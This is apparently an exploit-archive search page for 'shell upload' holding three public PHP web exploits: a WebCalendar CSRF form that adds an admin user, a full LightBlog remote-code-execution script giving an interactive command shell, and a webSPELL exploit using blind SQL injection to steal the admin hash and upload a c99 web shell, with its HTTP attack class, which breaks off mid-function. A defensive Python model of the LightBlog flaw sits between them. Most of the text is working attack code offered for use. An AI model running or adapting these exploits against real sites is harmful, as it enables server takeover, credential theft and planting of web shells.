shell upload

Search result for 'shell upload'

KedAns-Dz/WebCalendar CVS 1.2 Cross Site Request Forgery ( na)

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : WebCalendar CVS v1.2 Multiple (CSRF/XSRF) Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
# Twitter page : twitter.com/kedans | http://kedans.dis9.com
# platform : php
# Impact : Multiple (CSRF/XSRF)
# Tested on : Windows XP SP3 (Fr)
##
# [Indoushka] => Welcome back Br0ther <3 ^^
##
# | >> -------+++=[ Dz Offenders Cr3w ]=+++----- << |
# | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * ...|
# | ----------------------------------------------- |
# + All Dz .. This is Open Group 4 L33T Dz Hax3rZ ..
###

# Download : [http://www.k5n.us/files/webcalendar-cvs.tar.gz]

# (+) Exploit :

#==(1)==[ Add New User ]====>

<form action="http://site/edit_user_handler.php" name="edituser" method="post">
<input type="hidden" name="formtype" value="edituser" />
<input type="text" name="ufirstname" id="ufirstname" size="20" value="Ked" />
<input type="text" name="ulastname" id="ulastname" size="20" value="Ans" />
<input type="text" name="uemail" id="uemail" size="20" value="ked-h@hotmail.com" />
<input name="upassword1" id="pass1" size="15" value="" type="password" />
<input name="upassword2" id="pass2" size="15" value="" type="password" />
<input type="hidden" name="uenabled" value="Y" />
<input type="hidden" name="uis_admin" value="Y" />
<input type="hidden" name="u_enabled" value="Y" />
<input type="submit" value="Save &amp; Submit" />
</form>

#==(2)==[ Upload File via XSRF ]==>

<form action="docadd.php" method="post" name="docform" enctype="multipart/form-data">
<input type="hidden" name="id" value="<?php echo $id?>" />
<input type="hidden" name="type" value="A" />
<table>
<tr class="browse"><td>
<input type="file" name="FileName" id="fileupload" size="45" maxlength="50" />
<input type="text" name="description" size="30" maxlength="100" /></td></tr>
<td colspan="2">
<input type="submit" value="Upload &amp; Submit" /></td></tr>
</table>
</form>

# (^_^) ! Good Luck ALL ...

# | >> -------+++=[ Dz Offenders Cr3w ]=+++----- << |
# | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * ...|
# | ----------------------------------------------- |

#================[ Exploited By KedAns-Dz * Inj3ct0r * ]========================================= 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > + Rizky Ariestiyansyah * 1850 BBs
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team)
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * PaCketStorm Team (www.packetstormsecurity.org) * TreX (hotturks.org)
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ..
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever 
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================


WebCalendar CVS version 1.2 suffers from multiple cross site request forgery vulnerabilities.

EgiX/LightBlog 9.9.2 Code Execution ( na)

<?php

/*
  ---------------------------------------------------------------
  LightBlog <= 9.9.2 (register.php) Remote Code Execution Exploit
  ---------------------------------------------------------------

  author...: EgiX
  mail.....: n0b0d13s[at]gmail[dot]com

  link.....: http://www.publicwarehouse.co.uk/
  demo.....: http://www.bailey-projects.com/projects/1/lightblog/

  This PoC was written for educational purposes. Use it at your own risk.
  The author will not be responsible for any damage.

  [-] vulnerable code in /register.php

  58.      $username_towrite = stripslashes(htmlspecialchars($_POST['username_post'], ENT_QUOTES));
  59.      $password_towrite = stripslashes(md5(htmlspecialchars($_POST['pwd1_post'], ENT_QUOTES)));
  60.      $name_towrite = stripslashes(htmlspecialchars($_POST['name_post'], ENT_QUOTES));
  61.      $email_towrite = stripslashes(htmlspecialchars($_POST['email_post'], ENT_QUOTES));
  62.  
  63.      $newaccountfile = "./accounts/{$username_towrite}.php";
  64.                           
  65.      $details = "<?php
  66.                  \$password = \"{$password_towrite}\";
  67.                  \$name = \"{$name_towrite}\";
  68.                  \$email = \"{$email_towrite}\";
  69.                  \$type = \"member\";
  70.                  \$location = \"\";
  71.                  \$aboutme = \"\";
  72.                  \$website = \"\";
  73.                  ?>";
  74.  
  75.      $fd = fopen ($newaccountfile, "w");
  76.      chmod($newaccountfile, 0777);
  77.      fwrite ($fd, $details);
  78.      fclose($fd);

  An attacker could be able to inject and execute arbitrary PHP code because new accounts are saved
  with a "php" extension. This is possible because input is not properly sanitised, so you can use
  "complex curly syntax", which allows complex expressions to be placed inside string definitions.

  [-] vulnerable code in /check_user.php

  6.  if(isset($_COOKIE['Lightblog_username']) and isset($_COOKIE['Lightblog_password'])){
  7.  
  8.      $username_cookie = $_COOKIE['Lightblog_username'];
  9.      $password_cookie = $_COOKIE['Lightblog_password'];
  10.  
  11.      if(file_exists("./accounts/{$username_cookie}.php")){
  12.  
  13.          include("./accounts/{$username_cookie}.php");
  14.  
  15.          if($password_cookie != $password){
  16.              
  17.              setcookie("Lightblog_password", "", time()-9999999);
  18.              setcookie("Lightblog_username", "", time()-9999999);
  19.              echo "<script>location.replace('login.php')</script>";
  20.              exit; 
  21.  
  22.          } else { 
  23.              $username = $username_cookie;
  24.              $user = true; 
  25.          }

  In addition to the LFI (line 13), an attacker could be able to bypass the authentication by
  setting specially crafted cookies. So anyone can access cp_*.php and is able to upload
  arbitrary files or put malicious PHP code into e.g. settings.php. Arbitrary file upload PoC:

  POST /lightblog/cp_preview.php HTTP/1.0
  Host: localhost
  Cookie: Lightblog_password=; Lightblog_username=../header
  Content-Length: 166
  Content-Type: multipart/form-data; boundary=o0oOo0o
  Connection: close

  --o0oOo0o
  Content-Disposition: form-data; name="image"; filename="poc.php"

  <?php evil_code(); ?>
  --o0oOo0o--


  [-] Disclosure timeline:

  [21/04/2009] - Bug discovered
  [22/04/2009] - Vendor contacted but no response
  [25/04/2009] - Vendor contacted again still no response
  [26/04/2009] - Vendor has deleted any reference to LightBlog on his site (???)
  [27/04/2009] - Public disclosure

*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
  if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false)
    die("\nsocket_create(): " . socket_strerror(socket_last_error()) . "\n");

  if (socket_connect($s, $host, 80) === false)
    die("\nsocket_connect(): " . socket_strerror(socket_last_error($s)) . "\n");

  socket_write($s, $packet, strlen($packet));
  $response = '';
  while ($m = socket_read($s, 2048)) $response .= $m;

  socket_close($s);
  return $response;
}

print "\n+-------------------------------------------------------------------------+";
print "\n| LightBlog <= 9.9.2 (register.php) Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------------+\n";

if ($argc < 3)
{
  print "\nUsage......: php $argv[0] host path\n";
  print "\nExample....: php $argv[0] localhost /";
  print "\nExample....: php $argv[0] localhost /lightblog/\n\n";
  die();
}

$host = $argv[1];
$path = $argv[2];

$code = rawurlencode('{${error_reporting(0)}}{${print(_code_)}}{${passthru(base64_decode($_SERVER[HTTP_CMD]))}}{${die}}');

$payload = "username_post=test&pwd1_post=test&pwd2_post=test&name_post=test&email_post={$code}";
$packet  = "POST {$path}register.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

http_send($host, $packet);

$packet  = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: Lightblog_password=; Lightblog_username=test\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
  print "\nlightblog-shell# ";
  if (($cmd = trim(fgets(STDIN))) == "exit") break;
  $response = http_send($host, sprintf($packet, base64_encode($cmd)));
  if (!preg_match("/_code_/", $response)) die("\n[-] Exploit failed\n");
  // the injected print(_code_) marks where the command output starts
  $parts = explode("_code_", $response);
  print end($parts);
}

?>



LightBlog versions 9.9.2 and below remote code execution exploit that leverages register.php.
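Worked example, added here and not part of EgiX's exploit or of LightBlog's code: a Python model of what register.php lines 58-78 do to a submitted field. It shows that the quoted `stripslashes(htmlspecialchars(..., ENT_QUOTES))` sanitisation leaves the curly-syntax payload untouched (it contains none of the five characters htmlspecialchars rewrites), renders the account file the way the template at lines 65-73 does, scans the result for interpolation sequences inside double-quoted PHP literals, and then shows a hardened writer that whitelists the username (which also removes the `../header` path used in the cookie bypass, since the included file never assigns `$password` and PHP's loose `'' != null` is false) and emits values as single-quoted literals, in which `{$...}` is plain text. `FAKE_POST` is constructed sample input; `html.escape` spells the apostrophe entity differently from PHP's `&#039;`, which is irrelevant here.

```python
import hashlib
import html
import re

# Constructed sample POST: the fields the exploit sends, with the curly payload in email_post.
CURLY_PAYLOAD = ("{${error_reporting(0)}}{${print(_code_)}}"
                 "{${passthru(base64_decode($_SERVER[HTTP_CMD]))}}{${die}}")
FAKE_POST = {"username_post": "test", "pwd1_post": "test",
             "name_post": "test", "email_post": CURLY_PAYLOAD}


def php_stripslashes(s: str) -> str:
    """stripslashes(): remove one level of backslash escaping."""
    return re.sub(r"\\(.)", r"\1", s)


def sanitize_like_register_php(s: str) -> str:
    """Mirror of register.php lines 58-61. htmlspecialchars only rewrites & < > " ',
    so a payload built from { } $ ( ) [ ] _ and letters passes through unchanged."""
    return php_stripslashes(html.escape(s, quote=True))


def account_path(username: str) -> str:
    """register.php line 63 / check_user.php line 11: the name is used with no traversal check."""
    return f"./accounts/{username}.php"


def render_account_vulnerable(post: dict) -> str:
    """register.php lines 65-73: every field lands inside a double-quoted PHP literal."""
    password_hash = hashlib.md5(html.escape(post["pwd1_post"], quote=True).encode()).hexdigest()
    name = sanitize_like_register_php(post["name_post"])
    email = sanitize_like_register_php(post["email_post"])
    return ("<?php\n"
            f'$password = "{password_hash}";\n'
            f'$name = "{name}";\n'
            f'$email = "{email}";\n'
            '$type = "member";\n'
            "?>")


INTERP_RE = re.compile(r"\{\$[^}]*\}|\$\{[^}]*\}|\$[A-Za-z_]\w*")


def double_quoted_interpolations(php_src: str) -> list:
    """Walk the string literals of php_src and report interpolation sequences found inside
    double-quoted ones. Single-quoted literals are skipped: PHP never interpolates them."""
    found, i, n = [], 0, len(php_src)
    while i < n:
        quote = php_src[i]
        if quote in "\"'":
            j = i + 1
            while j < n and php_src[j] != quote:
                j += 2 if php_src[j] == "\\" else 1  # step over escaped characters
            if quote == '"':
                found.extend(INTERP_RE.findall(php_src[i + 1:j]))
            i = j + 1
        else:
            i += 1
    return found


USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def php_single_quoted(s: str) -> str:
    """Emit s as a single-quoted PHP literal (the escaping var_export() applies to strings)."""
    return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_account_hardened(post: dict) -> str:
    """Same layout, but the username is whitelisted (no '../' can reach the path) and values
    are single-quoted, so {$...} inside them is inert. Storing accounts as executable PHP is
    still poor design; a JSON file read with json_decode() avoids the include() entirely.
    The md5 hashing is kept as the application does it; it is not this example's topic."""
    username = post["username_post"]
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username must match [A-Za-z0-9_]{1,32}")
    password_hash = hashlib.md5(post["pwd1_post"].encode()).hexdigest()
    return ("<?php\n"
            f"$password = {php_single_quoted(password_hash)};\n"
            f"$name = {php_single_quoted(post['name_post'])};\n"
            f"$email = {php_single_quoted(post['email_post'])};\n"
            "$type = 'member';\n"
            "?>")


if __name__ == "__main__":
    vuln = render_account_vulnerable(FAKE_POST)
    print(vuln)
    print("interpolation sites in generated file:", double_quoted_interpolations(vuln))
    print("sites after hardening:", double_quoted_interpolations(render_account_hardened(FAKE_POST)))
```

The scanner is the check to run over any generator that writes PHP source from user data: a non-empty result means the file will evaluate attacker-controlled expressions the moment check_user.php includes it.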

DarkFig/webSPELL <= 4.01.02 Remote PHP Code Execution Exploit ( php)

#!/usr/bin/php
<?php
error_reporting(E_ALL ^ E_NOTICE);

# Admin id: 1
# Admin hash: 7b24afc8bc80e548d66c4e7ff72171c5
# Logged in (ws_auth=1%3A7b24afc8bc80e548d66c4e7ff72171c5)
# Trying to upload the malicious file
# Done (http://localhost/webspell4.01.02/downloads/c99shell.php)
#
if($argc < 5)
{
print ("
------   webSPELL <= 4.01.02 Remote PHP Code Execution Exploit   ------
-----------------------------------------------------------------------
PHP conditions: register_globals=On
       Credits: DarkFig <gmdarkfig@gmail.com>
           URL: http://www.acid-root.new.fr/
-----------------------------------------------------------------------
  Usage: $argv[0] -url <> -file <> [Options]
 Params: -url       For example http://victim.com/webspell/ 
         -file      The file you wanna upload (c99shell.php...)
Options: -prefix    Table prefix (default=webs)
         -upmatch   The match which returns TRUE for the upload
         -sqlmatch  The match which returns TRUE for the SQL injection
         -proxy     If you wanna use a proxy <proxyhost:proxyport> 
         -proxyauth Basic authentication <proxyuser:proxypwd>
Example: $argv[0] -url http://localhost/webspell/ -file c99shell.php
-----------------------------------------------------------------------
");exit(1);
}

$url            = getparam('url',1);
$file           = getparam('file',1);
$prfix          = (getparam('prefix')!='')   ? getparam('prefix')   : 'webs';
$match_upload   = (getparam('upmatch')!='')  ? getparam('upmatch')  : '\;URL\=index\.php\?site\=files\&file\=';
$match_blindsql = (getparam('sqlmatch')!='') ? getparam('sqlmatch') : 'site\=profile\&id\=';
$proxy          = getparam('proxy');
$authp          = getparam('proxyauth');

$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);

print "\nAdmin id: ";
$userid = blind('userID');

print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));

print "\nLogged in (ws_auth=$userid%3A$passwd)";
$xpl->addcookie("ws_auth",$userid."%3A".$passwd);


# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
print "\nTrying to upload the malicious file";
$frmdt = array(frmdt_url => $url.'index.php?site=files&action=save',
               "fileurl" => 1,
               "upfile"  => array(frmdt_filename => basename($file),
                                  frmdt_content  => file_get_contents($file)));

$xpl->formdata($frmdt);
if(preg_match("#$match_upload#si",$xpl->getcontent())) print "\nDone";
else print "\nFailed";
print " (${url}downloads/".basename($file).")\n";


# Simple blind SQL injection (register_globals=On)
#
# +members.php
# |
# 31. if($_GET['action']=="show") {
# 32. if($_GET['squadID']) {
# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';
# 34. }
# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER BY sort");
#
function blind($field)
{
	global $prfix,$xpl,$url,$match_blindsql;
	$d=0; $v='';
	
	if(strpos($field,'p')===false) { $b=47;$c=57; } # userID: digits 0-9 (47 is the end-of-string probe)
	else                           { $b=47;$c=70; } # password: md5 hex digits 0-9 and A-F
	
	while(TRUE)
	{
		$d++;
		for($e=$b;$e<=$c;$e++)
		{
		    if($e==47) $f='NULL';
		    else $f=$e;

		    $sql = "WHERE SUBSTR((SELECT $field FROM ${prfix}_user WHERE userID="
	                  ."(SELECT userID FROM ${prfix}_user_groups WHERE files=1 LIMIT 1)"
	                  ." LIMIT 1),$d,1)=CHAR($f)";
	       
	            $xpl->get($url."index.php?site=members&action=show&getsquad=".urlencode($sql));
	            if(preg_match("#$match_blindsql#",$xpl->getcontent(),$matches))
                    {
	        	if($e==47)
	        	{
	        	    return $v;
	        	}
	        	else
	        	{
	        	    print strtolower(chr($f));
	        	    $v .= chr($f);
	        	    break;
	        	}
                    }
		}
	}
}

function getparam($param,$opt='')
{
	global $argv;
	foreach($argv as $value => $key)
	{
		if($key == '-'.$param) return $argv[$value+1];
	}
	if($opt) exit("\n-$param parameter required");
	else return;
}

if(!function_exists('file_get_contents')) {
	function file_get_contents($file)
	{
		$handle  = fopen($file, "r");
		$content = fread($handle, filesize($file));
		fclose($handle);
		return $content;
	}
}

/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 * You should have received a copy of the GNU General Public License 
 * along with this program; if not, write to the Free Software 
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 * 
 * TITLE:          PhpSploit Class
 * REQUIREMENTS:   PHP 5 (remove "private", "public" if you have PHP 4)
 * VERSION:        1.2
 * LICENSE:        GNU General Public License
 * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
 * FILENAME:       phpsploitclass.php
 *
 * CONTACT:        gmdarkfig@gmail.com (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without) a
 * basic authentication. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allow
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allow the script to follow all
 * redirections sent by the server). It can return the content (or the
 * headers) of the request. Others useful functions can be used for debugging.
 * A manual is actually in development but to know how to use it, you can
 * read the comments.
 *
 * CHANGELOG:
 * [2007-01-24] (1.2)
 *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
 *  * New: multipart/form-data enctype is now supported 
 *
 * [2006-12-31] (1.1)
 *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
 *  * New: You can now call the getheader() / getcontent() function without parameters
 *
 * [2006-12-30] (1.0)
 *  * First version
 * 
 */

class phpsploit {

	/**
	 * This function is called by the get()/post() functions.
	 * You don't have to call it, this is the main function.
	 *
	 * @return $server_response
	 */
	private function sock()
	{
		if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);
		else $socket = fsockopen($this->host,$this->port);
		
		if(!$socket) die("Error: The host doesn't exist");
		
		if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n";
		elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n";
		else die("Error: Invalid method");
		
		if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n";
		$this->packet .= "Host: ".$this->host."\r\n";
		
		if(!empty($this->agent))  $this->packet .= "User-Agent: ".$this->agent."\r\n";
		if(!empty($this->header)) $this->packet .= $this->header."\r\n";
		if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n";
		
		$this->packet .= "Connection: Close\r\n";
		if($this->method==="post")
		{
			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
			$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
			$this->packet .= $this->data."\r\n";
		}
		elseif($this->method==="formdata")
		{
			$this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n";
			$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
			$this->packet .= $this->data;
		}
		$this->packet .= "\r\n";
		$this->recv = '';
		
		fputs($socket,$this->packet);
		while(!feof($socket)) $this->recv .= fgets($socket);
		fclose($socket);
		
		if($this->cookiejar) $this->cookiejar($this->getheader($this->recv));
		if($this->allowredirection) return $this->allowredirection($this->recv);
		else return $this->recv;
	}
	

	/**
	 * This function allows you to add several cookie in the
	 * request. Several methods are supported:
	 * 
	 * $this->addcookie("name","value");
	 * or
	 * $this->addcookie("name=newvalue");
	 * or
	 * $this->addcookie("othername=overvalue; xx=zz; y=u");
	 * 
	 * @param string $cookiename
	 * @param string $cookievalue
	 * 
	 */
	public function addcookie($cookn,$cookv='')
	{
		// $this->addcookie("name","value"); work avec replace
		if(!empty($cookv))
		{
			if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete
			if(!empty($this->cookie))
			{
			    if(preg_match("/$cookn=/",$this->cookie))
			    {
			    	$this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie);
			    }
			    else
			    {
			    	$this->cookie .= " ".$cookn."=".$cookv.";"; // " ".
			    }
			}
			else
			{
				$this->cookie = $cookn."=".$cookv.";";
			}
		}
		// $this->addcookie("name=value; othername=othervalue");
		else
		{
	    	 if(!empty($this->cookie))
	    	 {
	    	 	$cookn = preg_replace("/(.*);$/","$1",$cookn);
	    	 	$cookarr = explode(";",str_replace(" ", "",$cookn));
	    	 	for($i=0;$i<count($cookarr);$i++)
	    	 	{
	    	 		preg_match("/(\S*)=(\S*)/",$cookarr[$i],$matches);
	    	 		$cookn = $matches[1];
	    	 		$cookv = $matches[2];
	    	 		$this->addcookie($cookn,$cookv);
	    	 	}
	    	 }
			 else
			 {
			 	$cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";";
			 	$this->cookie = $cookn;			
			 }
		}
	}
	
	
	/**
	 * This function allows you to add several headers in the
	 * request. Several methods are supported:
	 *
	 * $this->addheader("headername","headervalue");
	 * or
	 * $this->addheader("headername: headervalue");
	 *
	 * @param string $headername
	 * @param string $headervalue
	 */
	public function addheader($headern,$headervalue='')
	{
		// $this->addheader("name","value");
		if(!empty($headervalue))
		{
			if(!empty($this->header))
			{
				if(preg_match("/$headern:/",$this->header))
				{
					$this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header);
				}
				else
				{
					$this->header .= "\r\n".$headern.": ".$headervalue;
				}
			}
			else
			{
				$this->header=$headern.": ".$headervalue;
			}
		}
		// $this->addheader("name: value");
		else 
		{
			if(!empty($this->header))
			{
				$headarr = explode(": ",$headern);
				$headern = $headarr[0];
				$headerv = $headarr[1];
				$this->addheader($headern,$headerv);
			}
			else
			{
				$this->header=$headern;
			}
		}
	}
	

	/**
	 * This function allows you to use an http proxy server.
	 * Several methods are supported:
	 * 
	 * $this->proxy("proxyip","8118");
	 * or
	 * $this->proxy("proxyip:8118")
	 *
	 * @param string $proxyhost
	 * @param integer $proxyport
	 */
	public function proxy($proxy,$proxyp='')
	{
		// $this->proxy("localhost:8118");
		if(empty($proxyp))
		{
			preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr);
			$proxh = $proxarr[1];
			$proxp = $proxarr[2];
			$this->proxyhost=$proxh;
			$this->proxyport=$proxp;
		}
		// $this->proxy("localhost",8118);
		else 
		{
			$this->proxyhost=$proxy;
			$this->proxyport=intval($proxyp);
		}
		if($this->proxyport > 65535) die("Error: Invalid port number");
	}
	

	/**
	 * This function allows you to use an http proxy server
	 * which requires a basic authentication. Several
	 * methods are supported:
	 * 
	 * $this->proxyauth("darkfig","dapasswd");
	 * or
	 * $this->proxyauth("darkfig:dapasswd");
	 *
	 * @param string $proxyuser
	 * @param string $proxypass
	 */
	public function proxyauth($proxyauth,$proxypasse='')
	{
		// $this->proxyauth("darkfig:password");
		if(empty($proxypasse))
		{
			preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr);
			$proxu = $proxautharr[1];
			$proxp = $proxautharr[2];
			$this->proxyuser=$proxu;
			$this->proxypass=$proxp;
		}
		// $this->proxyauth("darkfig","password");
		else
		{
			$this->proxyuser=$proxyauth;
			$this->proxypass=$proxypasse;
		}
	}

	
	/**
	 * This function allows you to set the "User-Agent" header.
	 * Several methods are possible to do that:
	 * 
	 * $this->agent("Mozilla Firefox");
	 * or
	 * $this->addheader("User-Agent: Mozilla Firefox");
	 * or
	 * $this->addheader("User-Agent","Mozilla Firefox");
	 * 
	 * @param string $useragent
	 */
	public function agent($useragent)
	{
		$this->agent=$useragent;
	}

	
	/**
	 * This function returns the header which will be
	 * in the next request.
	 * 
	 * $this->showheader();
	 *
	 * @return $header
	 */
	public function showheader()
	{
		return $this->header;
	}

	
	/**
	 * This function returns the cookie which will be
	 * in the next request.
	 * 
	 * $this->showcookie();
	 *
	 * @return $storedcookies
	 */
	public function showcookie()
	{
		return $this->cookie;
	}

	
	/**
	 * This function returns the last formed
	 * http request (the http packet).
	 * 
	 * $this->showlastrequest();
	 * 
	 * @return $last_http_request
	 */
	public function showlastrequest()
	{
		return $this->packet;
	}
	
	
	/**
	 * This function sends the formed http packet with the
	 * GET method. You can precise the port of the host.
	 * 
	 * $this->get("http://localhost");
	 * $this->get("http://localhost:888/xd/tst.php");
	 * 
	 * @param string $urlwithpath
	 * @return $server_response
	 */
	public function get($url)
	{
		$this->target($url);
		$this->method="get";
		return $this->sock();
	}

	
	/**
	 * This function sends the formed http packet with the
	 * POST method. You can precise the port of the host.
	 * 
	 * $this->post("http://localhost/index.php","admin=1&user=dark");
	 *
	 * @param string $urlwithpath
	 * @param string $postdata
	 * @return $server_response
	 */	
	public function post($url,$data)
	{
		$this->target($url);
		$this->method="post";
		$this->data=$data;
		return $this->sock();
	}
	

	/**
	 * This function sends the formed http packet with the
	 * POST method using the multipart/form-data enctype. 
	 * 
	 * $array = array(
	 *          frmdt_url      => "http://localhost/upload.php",
	 *          frmdt_boundary => "123456",                    # Optional
	 *                 "email" => "me@u.com",
	 *               "varname" => array(
	 *                            frmdt_type => "image/gif",   # Optional
	 *                       frmdt_transfert => "binary",      # Optional
	 *                        frmdt_filename => "hello.php",
	 *                         frmdt_content => "<?php echo ':)'; ?>"));
	 * $this->formdata($array);
	 *
	 * @param array $array
	 * @return $server_response
	 */
	public function formdata($array)
	{
		$this->target($array[frmdt_url]);
		$this->method="formdata";
		$this->data='';
		if(!isset($array[frmdt_boundary])) $this->boundary="phpsploit";
		else $this->boundary=$array[frmdt_boundary];
		foreach($array as $key => $value)
		{
			if(!preg_match("#^frmdt_(boundary|url)#",$key))
			{
				$this->data .= "-----------------------------".$this->boundary."\r\n";
				$this->data .= "Content-Disposition: form-data; name=\"".$key."\";";
				if(!is_array($value))
				{
					$this->data .= "\r\n\r\n".$value."\r\n";
				}
				else
				{
					$this->data .= " filename=\"".$array[$key][frmdt_filename]."\";\r\n";
					if(isset($array[$key][frmdt_type])) $this->data .= "Content-Type: ".$array[$key][frmdt_type]."\r\n";
					if(isset($array[$key][frmdt_transfert])) $this->data .= "Content-Transfer-Encoding: ".$array[$key][frmdt_transfert]."\r\n";
					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
				}
			}
		}
		$this->data .= "-----------------------------".$this->boundary."--\r\n";
		return $this->sock();
	}

	
	/**
	 * This function returns the content of the server response
	 * without the headers.
	 * 
	 * $this->getcontent($this->get("http://localhost/"));
	 * or
	 * $this->getcontent();
	 *
	 * @param string $server_response
	 * @return $onlythecontent
	 */
	public function getcontent($code='')
	{
		if(empty($code)) $code = $this->recv;
		$content = explode("\n",$code);
		$onlycode = '';
		for($i=1;$i<count($content);$i++)
		{
			if(!preg_match("/^(\S*):/",$content[$i])) $ok = 1;
			if($ok) $onlycode .= $content[$i]."\n";
		}
		return $onlycode;
	}

	
	/**
	 * This function returns the headers of the server response
	 * without the content.
	 * 
	 * $this->getheader($this->post("http://localhost/x.php","x=1&z=2"));
	 * or
	 * $this->getheader();
	 *
	 * @param string $server_response
	 * @return $onlytheheaders
	 */
	public function getheader($code='')
	{
